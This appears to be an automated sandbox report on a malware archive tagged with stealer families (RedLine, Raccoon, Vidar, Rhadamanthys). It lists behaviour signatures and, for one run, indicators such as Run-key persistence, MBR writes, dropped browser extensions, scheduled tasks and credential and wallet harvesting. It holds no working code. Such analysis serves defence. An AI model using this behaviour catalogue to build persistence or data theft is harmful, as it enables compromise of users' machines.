Malware Analysis Report

2025-05-28 17:27

Sample ID 230115-vqcesshe44
Target infected.zip
SHA256 4c7081148a218b609dca62b2ce1106e4a2e075671b0fb64352056cd6e58e7873
Tags
gcleaner raccoon redline rhadamanthys eb3a206cd939601b2a6d00ea009a6d7e bootkit discovery infostealer loader persistence spyware stealer upx purecrypter downloader evasion trojan 8f25ed0aa267992c7856160c3951e20b vidar 814
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4c7081148a218b609dca62b2ce1106e4a2e075671b0fb64352056cd6e58e7873

Threat Level: Known bad

The file infected.zip was found to be: Known bad.

Malicious Activity Summary

gcleaner raccoon redline rhadamanthys eb3a206cd939601b2a6d00ea009a6d7e bootkit discovery infostealer loader persistence spyware stealer upx purecrypter downloader evasion trojan 8f25ed0aa267992c7856160c3951e20b vidar 814

RedLine payload

Modifies Windows Defender Real-time Protection settings

Vidar

Rhadamanthys

Raccoon

Windows security bypass

GCleaner

RedLine

PureCrypter

Detect rhadamanthys stealer shellcode

Suspicious use of NtCreateUserProcessOtherParentProcess

ACProtect 1.3x - 1.4x DLL software

Executes dropped EXE

Blocklisted process makes network request

Downloads MZ/PE file

UPX packed file

Uses the VBS compiler for execution

Reads user/profile data of web browsers

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Writes to the Master Boot Record (MBR)

Drops desktop.ini file(s)

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Drops Chrome extension

Accesses 2FA software files, possible credential harvesting

Looks up external IP address via web service

Checks for any installed AV software in registry

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Modifies registry class

Modifies data under HKEY_USERS

Checks processor information in registry

Delays execution with timeout.exe

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Runs ping.exe

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-15 17:12

Signatures

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:17

Platform

win10v2004-20220812-en

Max time kernel

212s

Max time network

225s

Command Line

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

Signatures

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A

GCleaner

loader gcleaner

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3996 created 2468 N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe C:\Windows\system32\taskhostw.exe

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\ScanRename\ScanRename.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5FEB33CBE0463E334B23E93A48C2DB5C C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5FEB33CBE0463E334B23E93A48C2DB5C C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Windows\SysWOW64\is-752BJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\Fkxufiu.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A53B1AB43B3D351517A14F4A651C94F1 C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\fontview.exe N/A
N/A N/A C:\Windows\SysWOW64\fontview.exe N/A
N/A N/A C:\Windows\SysWOW64\fontview.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3996 set thread context of 1952 N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\OdCkbftzuRPDCLooswR\xprHIYg.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-DL9FL.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-SM4I8.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-N3B0G.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-U0NO9.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Languages\is-TJ8E5.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
File created C:\Program Files (x86)\ScanRename\is-3LBDQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-HVIUU.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-EP9NM.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-JJNEH.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-B9TM5.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File opened for modification C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-3UEPQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-23HT1.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-2L7CS.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-4O43K.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\English\is-NUOFE.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-0OITV.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-06SNK.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-QQUHA.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\unWhUoTpcLxwC\BoOieqA.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\NxGlAgQUfzUn\PlxUODa.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-B4BFK.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-6KBKJ.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-4QSVS.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\cjNumber C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-F7CVS.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\WyuevociGfNU2\AzXfaRieDbpAf.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-109K0.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-TFLMS.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-CQUMN.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-17VQJ.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-QVMD2.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-44H7C.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-JV0OQ.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-TNG86.tmp C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\ScanRename.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp N/A
File created C:\Program Files (x86)\XxxUzwYQU\zfRebA.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-7OO28.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-HTHBB.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-M0UH9.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-67BUK.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-GORKS.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-LN7NC.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-NHVQB.tmp C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-R7RB9.tmp C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\YQwpFizkoQMsJvRhq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\iwOiVBtjWoVYUMW.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
